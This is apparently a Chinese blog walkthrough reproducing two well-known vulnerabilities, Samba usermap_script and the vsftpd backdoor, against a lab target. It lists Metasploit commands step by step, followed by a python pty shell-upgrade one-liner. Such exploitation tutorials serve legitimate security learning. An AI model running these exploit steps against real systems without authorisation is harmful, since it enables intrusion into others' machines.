usermap\_script 漏洞复现

进入控制台

msfconsole

 title=

搜索 usermap\_script 模块

search usermap_script

 title=

使用第一个模块

use 0

查看模块参数

show options

 title=

设置靶机IP

set rhosts 192.168.91.160

开始攻击

run

 title=

发现 +0800 字样,说明攻击成功了,但是发现没有回显

使用强大python库

python -c "import pty;pty.spawn('/bin/bash')"

6.png

ok 完美拿下

Vsftpd 源码包后门漏洞复现

进入控制台

msfconsole

搜索vsftp的漏洞利用模块

search vsftp

7.png

第二个是攻击模块,第一个是扫描模块

选择第二个

use 1

查看参数

show options

设置靶机IP

set rhosts 192.168.91.160

开始攻击

run

8.png

看到攻击成功了,使用python调出交互式界面

python -c "import pty;pty.spawn('/bin/bash')"

9.png

**拿下 !**

最后修改:2024 年 12 月 28 日
如果觉得我的文章对你有用,请随意赞赏